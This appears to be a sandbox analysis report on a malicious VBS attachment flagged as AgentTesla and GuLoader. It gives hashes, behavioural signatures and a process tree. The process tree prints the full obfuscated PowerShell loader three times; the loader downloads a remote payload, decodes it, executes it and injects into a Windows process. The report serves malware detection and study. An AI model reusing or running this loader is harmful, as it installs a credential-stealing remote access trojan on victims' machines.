Overview

overview

10

Static

static

1

Justifican...90.vbs

windows7-x64

10

Justifican...90.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2024 14:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Justificante_134790.vbs

  • Size

    19KB

  • MD5

    9de837847e942e100339d463b5e83ea8

  • SHA1

    4a60fd23d3a15619b42755e0248805c66797fbed

  • SHA256

    41a67a39958b99af683c17ac26d30cdce693a10b96e4e95640230e22589ca592

  • SHA512

    ca7307aae1a71ad3ce08f5fd857b8df78139cdd9d990561fd05e9ee6108da3548fbb68a16a536abe1ccbdcd97318e030101fc0da176da6c6336a3aa28ed42297

  • SSDEEP

    384:66Q3GOmBsxCn0r7d8SfLnFW4mDAMnHiQBEiLwO9mvRwPzJ1:K39cs80r/RW4eHJBzwmm5W11

Score
10/10
agentteslaguloadercredential_accessdiscoverydownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_134790.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Forarbejdningen Kambal Jordklodernes Kardanakslen #>;$Damageableness='Olietj';<#Angara Enzo Cheliferous #>;$Relatch=$host.PrivateData;If ($Relatch) {$Dentality++;}function Concomitancy2($olearia){$Pneumonic=$olearia.Length-$Dentality;for( $Forladegevrs=4;$Forladegevrs -lt $Pneumonic;$Forladegevrs+=5){$Vbners+=$olearia[$Forladegevrs];}$Vbners;}function Hvsningen($Liturgist){ . ($Outfling) ($Liturgist);}$Ritraad=Concomitancy2 'Dec M GldoHydrzPantiRaa,l.edrldenta Unr/Embo5Reko. eu0 Slu gena(AweeWSleeiWheanPeridSkaro Raaw ,xesKla .okaNGarnTba,y Tal,1Knap0 jk. Hiv0V ss;Thim Cu.iWSjusiFascnu tr6Spil4Un n; Tyr Slu,xAncy6Teno4 co,;Resf ilsr p rv Eu : Sum1 Imp2B,ov1Ve k.,ess0Coro) Lil SornGMismeCarocGal,k G lo P.i/Fa.l2 anx0 Ar,1Incl0Post0Tilb1 Han0 Da,1ag e TropF,nwoiTvrmrReineBla fHun,o Senx B p/Prfa1Lidg2Hyp 1M,ni.Udre0fat ';$Seniorstipendiums=Concomitancy2 ' LasUFalkSB ane reerFunf- ,ogACh bgabu E UndnFanetBeco ';$Sammenrulning=Concomitancy2 ' ZanhFritthelltUncrpbalusRett: Bes/In g/ tardl inrForsi Fi v tu eF en. U,kgMandoDecioStorgArbel ConeSubs. ValcPaleoFilmmSint/TonguTip.cDeli?Iso.eblooxs.mmpHjeroAut.rOutgtInte=jovidAfs,oMitzwDolcnUn el lybosurvaL,nkdHusb&TidliIsskdDomm=Ten,1Pe ic MalPWabbYS ulJ Pre_DkskcBevf4MnemOKlo MGimpfPituvRam.ZS,ndDstruV onywSaetzUdveUHospdUndebBunk4AbscbEfteRFlakSHjem8Chau3Carrpga.sN strtInvaEP trH Unf3 larqPre ';$Andenstyrmanden=Concomitancy2 'Rste>Oms ';$Outfling=Concomitancy2 '.xteiLo.geRaceX.ver ';$Blindstory='Fuldbyrdelsernes';$Unpatriotically = Concomitancy2 '.ovee Blocb,erh lao Afl Remo%B,laa Phep ordpBun dGro,aVerntAntraTigg% K p\ FugVFluoaEd,krPoacmAkade Dipf Af.o Ly.rRel,d Inde.yphlI,skiNatunDanngSpro.L.gaR Gr da.phsSciu j nm&Nong&Aff Essae Nerc,nush ArdoU,pr ForttSejr ';Hvsningen (Concomitancy2 'Ram,$ A,ggforsl JonopassbKataa,perlRadi:P,olCOp.khScatiStamwT,naePietrCic eFlyt=Perm(Udfac SkjmAft dT,et Fuld/PallcMdea Acro$SandUPensnRec p RygaIncrtPortrOo oiD lcoRumitSkruiArb c.kaea istlCupelOmseyene )Ir a ');Hvsningen (Concomitancy2 'Brug$ ,isgB,ltlAnt.oJux bFashaBe ilEnqu:B.goSByrapHyp eRiciaHomokPaakeD scd,dree unsTrin= Adj$UnstSenera ThemVe um Sa eKosmn,uburJequuAn,blDronnUdfoiSem.nIndlgEkl .V.stsBad.pT iflM toiDob tViol( can$SlikAHornn PuldTe ge Chin Lo s SektGallymesorDatomLampak ydn AttdToileTh in Met)Lkke ');Hvsningen (Concomitancy2 'Gran[IndiNbrpleK,nctHuck. orcS udbeSte r,luov muliOps.c NoneHaysPSprto FusiUlyknPapat WorM,micaP lon LanaBehag ole Grir Aff]Hedg:Cara:fingSArbieBib.cDatauOverrAugmi squt eneyNi rPSt drSoraoAbslt rovo .rec DeboEnetlDig Apol=Neph Stan[,iddNTho,eSodotSusl.PrerSTax,eF micBogguDeckrOmdii emmtSki y orP DuorOve.oDiamtVoveoSnkecDokuoPseulPrciT M ryLu,epPoteeS,ff]Befe:F.rl:Deo TFirelGravs art1Indd2Nont ');$Sammenrulning=$Speakedes[0];$Forladegevrsnstigative= (Concomitancy2 'Rekt$ abogNonfl AksO MauBcupuASt rlBu,i:OsciuSammNMorgo RabfPjatfvodkiBla,CPosti,resAT yrL KolDSkalo rudMe ui=KandNUdlae Mo,wNome-KonooFendB .utJTeleE lync nglT,tai RullsDiteyBra sFosst m,nEDiskmNonb.IdenNE.eke,peitTrka.La eWArdeE St.bkabeCP lelForsI laue StinTragT');$Forladegevrsnstigative+=$Chiwere[1];Hvsningen ($Forladegevrsnstigative);Hvsningen (Concomitancy2 ' Piv$MonouEpoknAfnao R tfD,sifstatiMicrcDy kiSyndaBas l OvedNonaoOmismAk i.Sc,nHAarseApica ildKlireunp rAdvisTh.r[Aars$L.msSBydee Fidn M giAnemoOpfyrResesBegat ittiRefepKabae acnMaltd TvriTeknuSvanmaffrsDe.e]Frdi=Eldi$HoveRId niOvertAve.rBeboaUforaAutodBazo ');$theb=Concomitancy2 'Unex$Con.u SaynTrevoLeipf rief SmaiTrevc EnciPropaSk,ilNoncdFaweoKagem Akt.Pat,DDecooturmwadminJ lil Samo D fa RundVettFFroki BhilGolle ove(Buss$Res,SCuriaU damStatm ereAadsnEn.or Boru Elel Samn tariSa,mnTembg E p,Tje $ DiafBrinl F haTesugPu lr ndrd kro)Re a ';$flagrd=$Chiwere[0];Hvsningen (Concomitancy2 'Shah$BarrgChauLOms.o Na BDoddasc.pLPoma: GraPEuglEChemt unjTCab,lSponeToasDBrdl=Teg.( alkt BrkeScalS,oliT Po -ParspTaxiA LivTPhosHCoun neon$ Si FPolyLTingAChicGlaerRPhytDFar )Nose ');while (!$Pettled) {Hvsningen (Concomitancy2 'J de$A plg jerlOsteoM nobMaraa MenlBroo:RgerMPseuiOmd.cpengrInuro,rafsBan.c ldga E tlKaree ott=Pres$Symtt M kr Spou Mi.eGa.r ') ;Hvsningen $theb;Hvsningen (Concomitancy2 ' RanSOldttPhenaPer rShratOver-TwenSDortlRetreEnereZuccp opp dibb4Tusi ');Hvsningen (Concomitancy2 ' Sor$Lageg illDehyo Fo bNon a ReslPrec: acaPOliveDilatMiddtPaualTouceSeddd Int=Pa,h(t,plTSe teGe,asEpimtSpir- DetP Suba esitTow.h For Mo t$Pomaf ral undaI prgFondr InddForb) rmr ') ;Hvsningen (Concomitancy2 ' Vre$Cat gRoselProsoCoarb,iniaOutflOrga:SkieTKoereAan k Ud s ggrtDatalKa.eiKosanUnivjFerve Cys=Flyg$UndegSavelSolio LnpbKlynaCirklCoxo:OrdlA S,otMysttC quiReolcO eriind sGui.mSubc+Skul+Lysn%Anka$RelaSMannp HoreZoftaSta kRgteeAmnedTemeechros Smr.Pretc ,imoT tru lenSynktdier ') ;$Sammenrulning=$Speakedes[$Tekstlinje];}$Adresseberegningers=297474;$Feriefond=27990;Hvsningen (Concomitancy2 'Hawk$UldggInholStreoHanhb C laK oblAnak:U reDSunla LansOkseh forpKapilNoseaStilt HemeUnas Enhe=H mb FrisGJenseGr.vt Psy-NonjCMi,ooReginNonmtMicreH xan arktUdst Cha,$PatefF dslOveraAnt gUndirFaund Hae ');Hvsningen (Concomitancy2 'Ambl$Po ygmed lFor oD,onbhyd aN urlEsch:MiliTStreeRacek calsCurptCypritheflOmpliBr.gnFejldsaniuNat s RegtPlenrRetri poseSalmnArbis Use Stub= Te Nucl[HatrSSlakyGthes lgetProteSoupmUdkl.N,ncCBallo ulrnPedovdrivePla rAkslt,erv] Act:Sals:Ca.eFJowtrMesaoCommmT leBLizzastumsRecreDiff6 Bal4BoobSvilkt,etrrSterich onHyp,gKuld(Begu$N taDHejsaJu,ks fi,hSkydpPilol ameaPal tTo.ae Sil)Sm g ');Hvsningen (Concomitancy2 'Bogk$Lurkgreg l ensoAs rbAngeaKronlC ar: ClapDukke Kaar pvkmNecei DepnT.oggT ec Opst=Sipp Bnn[Ai iSAnkry eldsWarst U vescenmSnne. s cT FreeFlovxHerot U o. rotEHoven skec Bl.o SchdDetaiBliknTr,agSemi]Slav:Deme: BadAMoleSB saCNonfIGiraIStem. SulGDyrlegengtselvSDamptS.rerPergi Skrnscrag Cym(Folk$IsopTVerseGeorkBenzsdksottoboiClapl UndiUno nMatrdBlakuPerls LditBonarCosiimanieRacen NedsO.ot)Bonn ');Hvsningen (Concomitancy2 ' Cir$ spogTjhulP,roo Guyb,esiaTel l Sam:CobbDGener xcu Id k Dann Pl eOpfidKetudProgsIdio= Unc$syripBemjecut rAccemCribi SinnReskg D a.Sys,sfortuGoatbB gmsU,ectGuitrSa diEquan La,gBage( .je$AmaaATsa d AutrBidee Imis Gars rseeEntab Fore edar C reTereg Ca n F ei,rernCo fgBegieFu rrbannsSubs,Katt$Mu cFBergeStonrHaltiTum eCen fDowfoVkstnBethd Dac) G,w ');Hvsningen $Druknedds;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4488
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Varmefordeling.Rds && echo t"
        3⤵
          PID:3972
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Forarbejdningen Kambal Jordklodernes Kardanakslen #>;$Damageableness='Olietj';<#Angara Enzo Cheliferous #>;$Relatch=$host.PrivateData;If ($Relatch) {$Dentality++;}function Concomitancy2($olearia){$Pneumonic=$olearia.Length-$Dentality;for( $Forladegevrs=4;$Forladegevrs -lt $Pneumonic;$Forladegevrs+=5){$Vbners+=$olearia[$Forladegevrs];}$Vbners;}function Hvsningen($Liturgist){ . ($Outfling) ($Liturgist);}$Ritraad=Concomitancy2 'Dec M GldoHydrzPantiRaa,l.edrldenta Unr/Embo5Reko. eu0 Slu gena(AweeWSleeiWheanPeridSkaro Raaw ,xesKla .okaNGarnTba,y Tal,1Knap0 jk. Hiv0V ss;Thim Cu.iWSjusiFascnu tr6Spil4Un n; Tyr Slu,xAncy6Teno4 co,;Resf ilsr p rv Eu : Sum1 Imp2B,ov1Ve k.,ess0Coro) Lil SornGMismeCarocGal,k G lo P.i/Fa.l2 anx0 Ar,1Incl0Post0Tilb1 Han0 Da,1ag e TropF,nwoiTvrmrReineBla fHun,o Senx B p/Prfa1Lidg2Hyp 1M,ni.Udre0fat ';$Seniorstipendiums=Concomitancy2 ' LasUFalkSB ane reerFunf- ,ogACh bgabu E UndnFanetBeco ';$Sammenrulning=Concomitancy2 ' ZanhFritthelltUncrpbalusRett: Bes/In g/ tardl inrForsi Fi v tu eF en. U,kgMandoDecioStorgArbel ConeSubs. ValcPaleoFilmmSint/TonguTip.cDeli?Iso.eblooxs.mmpHjeroAut.rOutgtInte=jovidAfs,oMitzwDolcnUn el lybosurvaL,nkdHusb&TidliIsskdDomm=Ten,1Pe ic MalPWabbYS ulJ Pre_DkskcBevf4MnemOKlo MGimpfPituvRam.ZS,ndDstruV onywSaetzUdveUHospdUndebBunk4AbscbEfteRFlakSHjem8Chau3Carrpga.sN strtInvaEP trH Unf3 larqPre ';$Andenstyrmanden=Concomitancy2 'Rste>Oms ';$Outfling=Concomitancy2 '.xteiLo.geRaceX.ver ';$Blindstory='Fuldbyrdelsernes';$Unpatriotically = Concomitancy2 '.ovee Blocb,erh lao Afl Remo%B,laa Phep ordpBun dGro,aVerntAntraTigg% K p\ FugVFluoaEd,krPoacmAkade Dipf Af.o Ly.rRel,d Inde.yphlI,skiNatunDanngSpro.L.gaR Gr da.phsSciu j nm&Nong&Aff Essae Nerc,nush ArdoU,pr ForttSejr ';Hvsningen (Concomitancy2 'Ram,$ A,ggforsl JonopassbKataa,perlRadi:P,olCOp.khScatiStamwT,naePietrCic eFlyt=Perm(Udfac SkjmAft dT,et Fuld/PallcMdea Acro$SandUPensnRec p RygaIncrtPortrOo oiD lcoRumitSkruiArb c.kaea istlCupelOmseyene )Ir a ');Hvsningen (Concomitancy2 'Brug$ ,isgB,ltlAnt.oJux bFashaBe ilEnqu:B.goSByrapHyp eRiciaHomokPaakeD scd,dree unsTrin= Adj$UnstSenera ThemVe um Sa eKosmn,uburJequuAn,blDronnUdfoiSem.nIndlgEkl .V.stsBad.pT iflM toiDob tViol( can$SlikAHornn PuldTe ge Chin Lo s SektGallymesorDatomLampak ydn AttdToileTh in Met)Lkke ');Hvsningen (Concomitancy2 'Gran[IndiNbrpleK,nctHuck. orcS udbeSte r,luov muliOps.c NoneHaysPSprto FusiUlyknPapat WorM,micaP lon LanaBehag ole Grir Aff]Hedg:Cara:fingSArbieBib.cDatauOverrAugmi squt eneyNi rPSt drSoraoAbslt rovo .rec DeboEnetlDig Apol=Neph Stan[,iddNTho,eSodotSusl.PrerSTax,eF micBogguDeckrOmdii emmtSki y orP DuorOve.oDiamtVoveoSnkecDokuoPseulPrciT M ryLu,epPoteeS,ff]Befe:F.rl:Deo TFirelGravs art1Indd2Nont ');$Sammenrulning=$Speakedes[0];$Forladegevrsnstigative= (Concomitancy2 'Rekt$ abogNonfl AksO MauBcupuASt rlBu,i:OsciuSammNMorgo RabfPjatfvodkiBla,CPosti,resAT yrL KolDSkalo rudMe ui=KandNUdlae Mo,wNome-KonooFendB .utJTeleE lync nglT,tai RullsDiteyBra sFosst m,nEDiskmNonb.IdenNE.eke,peitTrka.La eWArdeE St.bkabeCP lelForsI laue StinTragT');$Forladegevrsnstigative+=$Chiwere[1];Hvsningen ($Forladegevrsnstigative);Hvsningen (Concomitancy2 ' Piv$MonouEpoknAfnao R tfD,sifstatiMicrcDy kiSyndaBas l OvedNonaoOmismAk i.Sc,nHAarseApica ildKlireunp rAdvisTh.r[Aars$L.msSBydee Fidn M giAnemoOpfyrResesBegat ittiRefepKabae acnMaltd TvriTeknuSvanmaffrsDe.e]Frdi=Eldi$HoveRId niOvertAve.rBeboaUforaAutodBazo ');$theb=Concomitancy2 'Unex$Con.u SaynTrevoLeipf rief SmaiTrevc EnciPropaSk,ilNoncdFaweoKagem Akt.Pat,DDecooturmwadminJ lil Samo D fa RundVettFFroki BhilGolle ove(Buss$Res,SCuriaU damStatm ereAadsnEn.or Boru Elel Samn tariSa,mnTembg E p,Tje $ DiafBrinl F haTesugPu lr ndrd kro)Re a ';$flagrd=$Chiwere[0];Hvsningen (Concomitancy2 'Shah$BarrgChauLOms.o Na BDoddasc.pLPoma: GraPEuglEChemt unjTCab,lSponeToasDBrdl=Teg.( alkt BrkeScalS,oliT Po -ParspTaxiA LivTPhosHCoun neon$ Si FPolyLTingAChicGlaerRPhytDFar )Nose ');while (!$Pettled) {Hvsningen (Concomitancy2 'J de$A plg jerlOsteoM nobMaraa MenlBroo:RgerMPseuiOmd.cpengrInuro,rafsBan.c ldga E tlKaree ott=Pres$Symtt M kr Spou Mi.eGa.r ') ;Hvsningen $theb;Hvsningen (Concomitancy2 ' RanSOldttPhenaPer rShratOver-TwenSDortlRetreEnereZuccp opp dibb4Tusi ');Hvsningen (Concomitancy2 ' Sor$Lageg illDehyo Fo bNon a ReslPrec: acaPOliveDilatMiddtPaualTouceSeddd Int=Pa,h(t,plTSe teGe,asEpimtSpir- DetP Suba esitTow.h For Mo t$Pomaf ral undaI prgFondr InddForb) rmr ') ;Hvsningen (Concomitancy2 ' Vre$Cat gRoselProsoCoarb,iniaOutflOrga:SkieTKoereAan k Ud s ggrtDatalKa.eiKosanUnivjFerve Cys=Flyg$UndegSavelSolio LnpbKlynaCirklCoxo:OrdlA S,otMysttC quiReolcO eriind sGui.mSubc+Skul+Lysn%Anka$RelaSMannp HoreZoftaSta kRgteeAmnedTemeechros Smr.Pretc ,imoT tru lenSynktdier ') ;$Sammenrulning=$Speakedes[$Tekstlinje];}$Adresseberegningers=297474;$Feriefond=27990;Hvsningen (Concomitancy2 'Hawk$UldggInholStreoHanhb C laK oblAnak:U reDSunla LansOkseh forpKapilNoseaStilt HemeUnas Enhe=H mb FrisGJenseGr.vt Psy-NonjCMi,ooReginNonmtMicreH xan arktUdst Cha,$PatefF dslOveraAnt gUndirFaund Hae ');Hvsningen (Concomitancy2 'Ambl$Po ygmed lFor oD,onbhyd aN urlEsch:MiliTStreeRacek calsCurptCypritheflOmpliBr.gnFejldsaniuNat s RegtPlenrRetri poseSalmnArbis Use Stub= Te Nucl[HatrSSlakyGthes lgetProteSoupmUdkl.N,ncCBallo ulrnPedovdrivePla rAkslt,erv] Act:Sals:Ca.eFJowtrMesaoCommmT leBLizzastumsRecreDiff6 Bal4BoobSvilkt,etrrSterich onHyp,gKuld(Begu$N taDHejsaJu,ks fi,hSkydpPilol ameaPal tTo.ae Sil)Sm g ');Hvsningen (Concomitancy2 'Bogk$Lurkgreg l ensoAs rbAngeaKronlC ar: ClapDukke Kaar pvkmNecei DepnT.oggT ec Opst=Sipp Bnn[Ai iSAnkry eldsWarst U vescenmSnne. s cT FreeFlovxHerot U o. rotEHoven skec Bl.o SchdDetaiBliknTr,agSemi]Slav:Deme: BadAMoleSB saCNonfIGiraIStem. SulGDyrlegengtselvSDamptS.rerPergi Skrnscrag Cym(Folk$IsopTVerseGeorkBenzsdksottoboiClapl UndiUno nMatrdBlakuPerls LditBonarCosiimanieRacen NedsO.ot)Bonn ');Hvsningen (Concomitancy2 ' Cir$ spogTjhulP,roo Guyb,esiaTel l Sam:CobbDGener xcu Id k Dann Pl eOpfidKetudProgsIdio= Unc$syripBemjecut rAccemCribi SinnReskg D a.Sys,sfortuGoatbB gmsU,ectGuitrSa diEquan La,gBage( .je$AmaaATsa d AutrBidee Imis Gars rseeEntab Fore edar C reTereg Ca n F ei,rernCo fgBegieFu rrbannsSubs,Katt$Mu cFBergeStonrHaltiTum eCen fDowfoVkstnBethd Dac) G,w ');Hvsningen $Druknedds;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2160
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Forarbejdningen Kambal Jordklodernes Kardanakslen #>;$Damageableness='Olietj';<#Angara Enzo Cheliferous #>;$Relatch=$host.PrivateData;If ($Relatch) {$Dentality++;}function Concomitancy2($olearia){$Pneumonic=$olearia.Length-$Dentality;for( $Forladegevrs=4;$Forladegevrs -lt $Pneumonic;$Forladegevrs+=5){$Vbners+=$olearia[$Forladegevrs];}$Vbners;}function Hvsningen($Liturgist){ . ($Outfling) ($Liturgist);}$Ritraad=Concomitancy2 'Dec M GldoHydrzPantiRaa,l.edrldenta Unr/Embo5Reko. eu0 Slu gena(AweeWSleeiWheanPeridSkaro Raaw ,xesKla .okaNGarnTba,y Tal,1Knap0 jk. Hiv0V ss;Thim Cu.iWSjusiFascnu tr6Spil4Un n; Tyr Slu,xAncy6Teno4 co,;Resf ilsr p rv Eu : Sum1 Imp2B,ov1Ve k.,ess0Coro) Lil SornGMismeCarocGal,k G lo P.i/Fa.l2 anx0 Ar,1Incl0Post0Tilb1 Han0 Da,1ag e TropF,nwoiTvrmrReineBla fHun,o Senx B p/Prfa1Lidg2Hyp 1M,ni.Udre0fat ';$Seniorstipendiums=Concomitancy2 ' LasUFalkSB ane reerFunf- ,ogACh bgabu E UndnFanetBeco ';$Sammenrulning=Concomitancy2 ' ZanhFritthelltUncrpbalusRett: Bes/In g/ tardl inrForsi Fi v tu eF en. U,kgMandoDecioStorgArbel ConeSubs. ValcPaleoFilmmSint/TonguTip.cDeli?Iso.eblooxs.mmpHjeroAut.rOutgtInte=jovidAfs,oMitzwDolcnUn el lybosurvaL,nkdHusb&TidliIsskdDomm=Ten,1Pe ic MalPWabbYS ulJ Pre_DkskcBevf4MnemOKlo MGimpfPituvRam.ZS,ndDstruV onywSaetzUdveUHospdUndebBunk4AbscbEfteRFlakSHjem8Chau3Carrpga.sN strtInvaEP trH Unf3 larqPre ';$Andenstyrmanden=Concomitancy2 'Rste>Oms ';$Outfling=Concomitancy2 '.xteiLo.geRaceX.ver ';$Blindstory='Fuldbyrdelsernes';$Unpatriotically = Concomitancy2 '.ovee Blocb,erh lao Afl Remo%B,laa Phep ordpBun dGro,aVerntAntraTigg% K p\ FugVFluoaEd,krPoacmAkade Dipf Af.o Ly.rRel,d Inde.yphlI,skiNatunDanngSpro.L.gaR Gr da.phsSciu j nm&Nong&Aff Essae Nerc,nush ArdoU,pr ForttSejr ';Hvsningen (Concomitancy2 'Ram,$ A,ggforsl JonopassbKataa,perlRadi:P,olCOp.khScatiStamwT,naePietrCic eFlyt=Perm(Udfac SkjmAft dT,et Fuld/PallcMdea Acro$SandUPensnRec p RygaIncrtPortrOo oiD lcoRumitSkruiArb c.kaea istlCupelOmseyene )Ir a ');Hvsningen (Concomitancy2 'Brug$ ,isgB,ltlAnt.oJux bFashaBe ilEnqu:B.goSByrapHyp eRiciaHomokPaakeD scd,dree unsTrin= Adj$UnstSenera ThemVe um Sa eKosmn,uburJequuAn,blDronnUdfoiSem.nIndlgEkl .V.stsBad.pT iflM toiDob tViol( can$SlikAHornn PuldTe ge Chin Lo s SektGallymesorDatomLampak ydn AttdToileTh in Met)Lkke ');Hvsningen (Concomitancy2 'Gran[IndiNbrpleK,nctHuck. orcS udbeSte r,luov muliOps.c NoneHaysPSprto FusiUlyknPapat WorM,micaP lon LanaBehag ole Grir Aff]Hedg:Cara:fingSArbieBib.cDatauOverrAugmi squt eneyNi rPSt drSoraoAbslt rovo .rec DeboEnetlDig Apol=Neph Stan[,iddNTho,eSodotSusl.PrerSTax,eF micBogguDeckrOmdii emmtSki y orP DuorOve.oDiamtVoveoSnkecDokuoPseulPrciT M ryLu,epPoteeS,ff]Befe:F.rl:Deo TFirelGravs art1Indd2Nont ');$Sammenrulning=$Speakedes[0];$Forladegevrsnstigative= (Concomitancy2 'Rekt$ abogNonfl AksO MauBcupuASt rlBu,i:OsciuSammNMorgo RabfPjatfvodkiBla,CPosti,resAT yrL KolDSkalo rudMe ui=KandNUdlae Mo,wNome-KonooFendB .utJTeleE lync nglT,tai RullsDiteyBra sFosst m,nEDiskmNonb.IdenNE.eke,peitTrka.La eWArdeE St.bkabeCP lelForsI laue StinTragT');$Forladegevrsnstigative+=$Chiwere[1];Hvsningen ($Forladegevrsnstigative);Hvsningen (Concomitancy2 ' Piv$MonouEpoknAfnao R tfD,sifstatiMicrcDy kiSyndaBas l OvedNonaoOmismAk i.Sc,nHAarseApica ildKlireunp rAdvisTh.r[Aars$L.msSBydee Fidn M giAnemoOpfyrResesBegat ittiRefepKabae acnMaltd TvriTeknuSvanmaffrsDe.e]Frdi=Eldi$HoveRId niOvertAve.rBeboaUforaAutodBazo ');$theb=Concomitancy2 'Unex$Con.u SaynTrevoLeipf rief SmaiTrevc EnciPropaSk,ilNoncdFaweoKagem Akt.Pat,DDecooturmwadminJ lil Samo D fa RundVettFFroki BhilGolle ove(Buss$Res,SCuriaU damStatm ereAadsnEn.or Boru Elel Samn tariSa,mnTembg E p,Tje $ DiafBrinl F haTesugPu lr ndrd kro)Re a ';$flagrd=$Chiwere[0];Hvsningen (Concomitancy2 'Shah$BarrgChauLOms.o Na BDoddasc.pLPoma: GraPEuglEChemt unjTCab,lSponeToasDBrdl=Teg.( alkt BrkeScalS,oliT Po -ParspTaxiA LivTPhosHCoun neon$ Si FPolyLTingAChicGlaerRPhytDFar )Nose ');while (!$Pettled) {Hvsningen (Concomitancy2 'J de$A plg jerlOsteoM nobMaraa MenlBroo:RgerMPseuiOmd.cpengrInuro,rafsBan.c ldga E tlKaree ott=Pres$Symtt M kr Spou Mi.eGa.r ') ;Hvsningen $theb;Hvsningen (Concomitancy2 ' RanSOldttPhenaPer rShratOver-TwenSDortlRetreEnereZuccp opp dibb4Tusi ');Hvsningen (Concomitancy2 ' Sor$Lageg illDehyo Fo bNon a ReslPrec: acaPOliveDilatMiddtPaualTouceSeddd Int=Pa,h(t,plTSe teGe,asEpimtSpir- DetP Suba esitTow.h For Mo t$Pomaf ral undaI prgFondr InddForb) rmr ') ;Hvsningen (Concomitancy2 ' Vre$Cat gRoselProsoCoarb,iniaOutflOrga:SkieTKoereAan k Ud s ggrtDatalKa.eiKosanUnivjFerve Cys=Flyg$UndegSavelSolio LnpbKlynaCirklCoxo:OrdlA S,otMysttC quiReolcO eriind sGui.mSubc+Skul+Lysn%Anka$RelaSMannp HoreZoftaSta kRgteeAmnedTemeechros Smr.Pretc ,imoT tru lenSynktdier ') ;$Sammenrulning=$Speakedes[$Tekstlinje];}$Adresseberegningers=297474;$Feriefond=27990;Hvsningen (Concomitancy2 'Hawk$UldggInholStreoHanhb C laK oblAnak:U reDSunla LansOkseh forpKapilNoseaStilt HemeUnas Enhe=H mb FrisGJenseGr.vt Psy-NonjCMi,ooReginNonmtMicreH xan arktUdst Cha,$PatefF dslOveraAnt gUndirFaund Hae ');Hvsningen (Concomitancy2 'Ambl$Po ygmed lFor oD,onbhyd aN urlEsch:MiliTStreeRacek calsCurptCypritheflOmpliBr.gnFejldsaniuNat s RegtPlenrRetri poseSalmnArbis Use Stub= Te Nucl[HatrSSlakyGthes lgetProteSoupmUdkl.N,ncCBallo ulrnPedovdrivePla rAkslt,erv] Act:Sals:Ca.eFJowtrMesaoCommmT leBLizzastumsRecreDiff6 Bal4BoobSvilkt,etrrSterich onHyp,gKuld(Begu$N taDHejsaJu,ks fi,hSkydpPilol ameaPal tTo.ae Sil)Sm g ');Hvsningen (Concomitancy2 'Bogk$Lurkgreg l ensoAs rbAngeaKronlC ar: ClapDukke Kaar pvkmNecei DepnT.oggT ec Opst=Sipp Bnn[Ai iSAnkry eldsWarst U vescenmSnne. s cT FreeFlovxHerot U o. rotEHoven skec Bl.o SchdDetaiBliknTr,agSemi]Slav:Deme: BadAMoleSB saCNonfIGiraIStem. SulGDyrlegengtselvSDamptS.rerPergi Skrnscrag Cym(Folk$IsopTVerseGeorkBenzsdksottoboiClapl UndiUno nMatrdBlakuPerls LditBonarCosiimanieRacen NedsO.ot)Bonn ');Hvsningen (Concomitancy2 ' Cir$ spogTjhulP,roo Guyb,esiaTel l Sam:CobbDGener xcu Id k Dann Pl eOpfidKetudProgsIdio= Unc$syripBemjecut rAccemCribi SinnReskg D a.Sys,sfortuGoatbB gmsU,ectGuitrSa diEquan La,gBage( .je$AmaaATsa d AutrBidee Imis Gars rseeEntab Fore edar C reTereg Ca n F ei,rernCo fgBegieFu rrbannsSubs,Katt$Mu cFBergeStonrHaltiTum eCen fDowfoVkstnBethd Dac) G,w ');Hvsningen $Druknedds;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3228
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Varmefordeling.Rds && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5080
            • C:\Program Files (x86)\windows mail\wabmig.exe
